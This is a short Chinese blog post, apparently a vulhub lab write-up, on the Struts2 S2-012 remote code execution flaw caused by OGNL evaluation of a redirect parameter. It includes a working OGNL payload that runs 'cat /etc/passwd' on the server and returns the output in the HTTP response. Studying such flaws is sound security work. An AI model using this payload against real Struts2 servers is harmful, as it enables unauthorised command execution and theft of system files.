S2-012 远程代码执行漏洞

原理

如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,例如:


    
        /index.jsp?name=${name}
        /index.jsp
        /index.jsp
    

这里 UserAction 中定义有一个 name 变量,当触发 redirect 类型返回时,Struts2 获取使用 ${name} 获取其值,在这个过程中会对 name 参数的值执行 OGNL 表达式解析,从而可以插入任意 OGNL 表达式导致命令执行。

Exp

使用s2-001里面的payload读账号密码文件
链接:
https://blog.csdn.net/qq_29647709/article/details/84945159
S2-012 远程代码执行漏洞_第1张图片

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

S2-012 远程代码执行漏洞_第2张图片
参考链接:
https://github.com/vulhub/vulhub/blob/master/struts2/s2-012/README.zh-cn.md
S2-012 远程代码执行漏洞_第3张图片

你可能感兴趣的:(漏洞利用)